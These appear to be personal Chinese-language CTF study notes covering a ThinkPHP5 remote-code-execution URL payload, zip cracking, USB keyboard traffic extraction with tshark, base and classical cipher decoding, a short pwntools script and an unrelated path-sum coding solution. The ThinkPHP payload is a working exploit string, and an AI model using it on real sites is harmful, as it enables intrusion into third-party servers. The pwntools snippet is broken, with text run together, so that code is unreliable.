1
php_rce
ThinkPHP5框架
/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞
知道某个网页使用的框架版本,百度,利用漏洞获得想要的信息
2
破解zip
提示,都要是数字,long是指什么:
是long类型进行bytes_to_long操作(F)
直接的26字母表:A-1 B-2...
图片foremost,图片找密码
(以后怎么能够从第一步就找到所有hid)
改高操作
流量分析
全是USB协议
USB键盘流量数据分析与键盘按键值解码-CSDN博客
【流量分析】USB键盘与鼠标流量分析_ctf usb流量分析-CSDN博客
kali下提取len=35指令:
tshark -r mysterious.pcapng -T fields -e usb.capdata -Y frame.len==35 >1.txt
base解码
前半段是base64,后半段不是
想办法分开,尝试先把==结尾的base64分开,
再对后半部分尝试解码,确实都不是base64,没有等号有小写,尝试base58解码
emoji解密
base解码
还是没有=,有小写,但有I字母,不满足base58,base64解码
仿射密码
6 9 12...
3vigenère Cipher
猜密钥就是"KEY"
加密的Vigenère密码,在线解密
4
from pwn import *
#p=process("./babyre2")
#p=remote("127.0.0.1",1339)
p=recvuntil("Please input the account:")
p.send("aaaaaaaa")
p.recvuntil("password:")
p.send("11111111")
payload="ad"*0x30
p.recvuntil("data:")
p.send(payload)
p.interactive5
class Solution {
public:
int minPathSum(vector<vector<int> >& matrix) {
int row = matrix.size(), col = matrix[0].size();
for (int i = 0; i < row; i ++) {
for (int j = 0; j < col; j ++) {
if (i == 0 && j != 0) { // 数组第一行
matrix[0][j] += matrix[0][j - 1];
} else if (j == 0 && i != 0) { // 数组第一列
matrix[i][0] += matrix[i - 1][0];
} else if (i > 0 && j > 0) {
// 取最小
matrix[i][j] += min(matrix[i - 1][j], matrix[i][j - 1]);
}
}
}
return matrix[row - 1][col - 1];
}
};